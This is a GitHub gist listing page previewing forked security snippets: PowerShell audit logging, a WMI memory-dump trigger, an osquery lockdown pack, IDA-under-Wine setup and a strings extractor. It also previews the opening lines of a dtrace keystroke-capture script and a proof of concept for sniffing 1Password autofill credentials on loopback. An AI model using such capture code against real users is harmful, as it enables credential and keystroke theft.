lctrcl lctrcl
lctrcl
/ PowerShell Command Line Logging
Created
March 1, 2017 11:03
— forked from gfoss/PowerShell Command Line Logging
Detect and alert on nefarious PowerShell command line activity
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
| # For detecting dangerous PowerShell Commands/Functions | |
| Log Source Type: | |
| MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
| Add this file to your PowerShell directory to enable verbose command line audit logging | |
| profile.ps1 | |
| $LogCommandHealthEvent = $true | |
| $LogCommandLifeCycleEvent = $true |
lctrcl
/ autodump_powershell_process.ps1
Created
August 9, 2016 07:45
— forked from mattifestation/autodump_powershell_process.ps1
Automatically capture a full PowerShell memory dump upon any PowerShell host process termination
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'PowerShellProcessStarted' | |
| Query = 'SELECT FileName, ProcessID FROM Win32_ModuleLoadTrace WHERE FileName LIKE "%System.Management.Automation%.dll"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $Filter = New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $EventFilterArgs | |
| $CommandLineConsumerArgs = @{ |
lctrcl
/ osxlockdown.conf
Created
July 26, 2016 13:40
— forked from arubdesu/osxlockdown.conf
query pack (v1) for https://github.com/SummitRoute/osxlockdown
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "packs": { | |
| "osxlockdown": { | |
| "platform": "darwin", | |
| "version": ".1", | |
| "queries": { | |
| "OS Updates": { | |
| "query": "select value from preferences where path = '/Library/Preferences/com.apple.SoftwareUpdate.plist' and key = 'LastSuccessfulDate';", | |
| "interval": "86400", | |
| "description": "Verify all Apple OS-bundled software has checked it's configured server recently", |
lctrcl
/ keystrokes.d
Created
May 30, 2016 17:16
— forked from palmerabollo/keystrokes.d
dtrace keystrokes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/sbin/dtrace -s | |
| syscall::read:entry | |
| /execname == "sh" || execname == "ksh" || execname == "csh" || | |
| execname == "tcsh" || execname == "zsh" || execname == "bash"/ | |
| { | |
| self->start = timestamp; | |
| self->buf = arg1; | |
| self->len = arg2; | |
| } |
lctrcl
/ steal_1password_creds.rb
Created
May 23, 2016 20:23
— forked from claudijd/steal_1password_creds.rb
Steal 1Password credentials from browser auto-fill PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Path setting slight of hand: | |
| $: << File.expand_path("../../lib", __FILE__) | |
| require 'packetfu' | |
| require 'json' | |
| capture_thread = Thread.new do | |
| cap = PacketFu::Capture.new(:iface => 'lo0', :start => true) | |
| cap.stream.each do |p| | |
| pkt = PacketFu::Packet.parse p | |
| if pkt.payload.include?("executeFillScript") |
lctrcl
/ commands.sh
Created
April 11, 2016 09:07
— forked from williballenthin/commands.sh
Install IDA Pro under Wine in Docker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # build wine Docker image | |
| pushd wine; docker build -t wine .; popd | |
| # build x11 Docker image for IDA | |
| pushd ida; docker build -t wine/ida .; popd | |
| # demonstrate x11 forwarding works | |
| run -ti --rm -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix wine/ida xclock | |
| # interactive shell in container |
lctrcl
/ strings.py
Created
April 7, 2016 12:54
— forked from williballenthin/strings.py
Extract ASCII and Unicode strings using Python.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| from collections import namedtuple | |
| ASCII_BYTE = " !\"#\$%&\'\(\)\*\+,-\./0123456789:;<=>\?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\]\^_`abcdefghijklmnopqrstuvwxyz\{\|\}\\\~\t" | |
| String = namedtuple("String", ["s", "offset"]) | |
NewerOlder